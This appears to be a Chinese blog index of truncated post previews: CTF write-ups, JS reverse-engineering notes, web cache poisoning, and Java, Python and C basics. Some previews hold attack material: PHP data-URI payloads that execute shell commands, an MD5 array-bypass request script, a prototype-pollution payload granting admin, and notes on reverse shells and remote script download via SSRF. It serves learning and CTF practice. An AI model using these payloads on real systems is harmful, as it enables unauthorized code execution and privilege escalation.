前端路径 E:\sky\nginx-1.20.2 localhost:80 后端部署 1. git本地推送 常量.getBytes()是字符串转化为 字节数组的方法 1234567String password = "123456";byte[] bytes = password.getBytes();[49, 50, 51, 52, 53, 54] Controller控制层->service业务层->Mapper持久层->Database数据库 来补一下基础知识,参考网址 12345public class Hello{ public
signin 123data:,<?=`nl %252F*`;data:,<?=`$_GET[1]`; 渗透测试 这里学一下js逆向 在网页中找到对应的接口,分静态和动态 无混淆加密的定位方法:关键字搜索。 通过关键字搜索定位加密位置或解密位置 关键字需要具有独特性,不能是username或password这类通用英文单词 关键字特征:没有加解密能力(atob等); 12345// 1. 关键字独特:INTRACT_data(不是通用词,是网站自定义的变量名)// 2. 关键字本身无解密能力:只是存了密文,自己不会解密let INTRACT_data = &qu
依旧中译中,大佬说py代码会降低复现失败的概率 Ezmd5 值不能相等,但是md5值要强相等,数组绕过 弱相等的用0e绕过 123456789101112131415161718192021222324import requestsimport re # 用于从网页返回的文本中匹配、提取符合特定格式的字符串url="http://ctf.furryctf.com:32838/"data={ "user[]":"1", "pass[]":"2"}r = reque
unictf 的wp中译中,包含名词解释和代码批注,全手打无粘贴(链接和回显除外) intrasight https://www.ctfplus.cn/problem-detail/2019277782340603904/description 打开界面判断是ssrf,预览80端口请求成功,预览https://111222.free.beeceptor.com也请求成功,说明可以出网 出网可以主动访问公网ip和域名,可以直接nc反弹shell到自己的公网vps(云服务器),远程下载利用脚本(靶机支持wget,cuel,certutil等下载命令),dnslog外带信息 不出网只能访问本地和
攻防世界 1.wife_wife payload 123{"username":"admin1","password":"1","__proto__":{"isAdmin":true},"inviteCode":"1"} 造成这个漏洞的有一个很重要的前提,这题目的后端是node.js来写的,也就是说后端不是php服务器,不是java服务器,而是JavaScript服务器 因为是JavaScri
web缓存中毒 发送导致有危害响应的请求,该响应将保存在缓存中并提供给其他用户。 x-forward-for 客户端→代理 / 负载均衡→服务器时,服务器默认仅记录最后一跳代理 / 负载均衡的 IP,无法获取真实客户端 IP。 解决逻辑:代理 / 负载均衡转发请求时,将请求来源 IP 追加到 XFF 头部,形成按转发顺序排列的 IP 链,服务器读取该头部即可提取最左侧的原始客户端 IP。 示例 单代理:客户端 IP 203.0.113.195 → 代理 IP 198.51.100.1 → 服务器。XFF 为 X-Forwarded-For: 203.0.113.195, 198.
题目好新,我好废物,总是卡在一个点上过不去,我还年轻,还菜的起 b@by n0t1ce b0ard 12345678910111213141516171819202122232425262728293031<?phpextract($_POST);//可能变量覆盖,extract — 从数组中将变量导入到当前的符号表if(isset($save)){ if($e=="" || $p=="") { $err="<font color='red'>fill all the fileds f
http状态码获取 客户端请求,服务端响应 响应状态码:标识接收或拒绝请求 python解决问题 1234567import requestsurl = "https://httpbin.org/#/HTTP_Methods/get_get"r=requests.get(url=url)print(r.status_code) http请求 get传递参数 123456789import requestsurl = "https://www.baidu.com"payload = {'username':'
c语言 1234567891011121314151617#include <stdio.h> #define LENGTH 10 #define WIDTH 5#define NEWLINE '\n' int main(){ int area; area = LENGTH * WIDTH; printf("value of area : %d", area); printf("%c", NEWLINE); return 0;} 12345678910111213
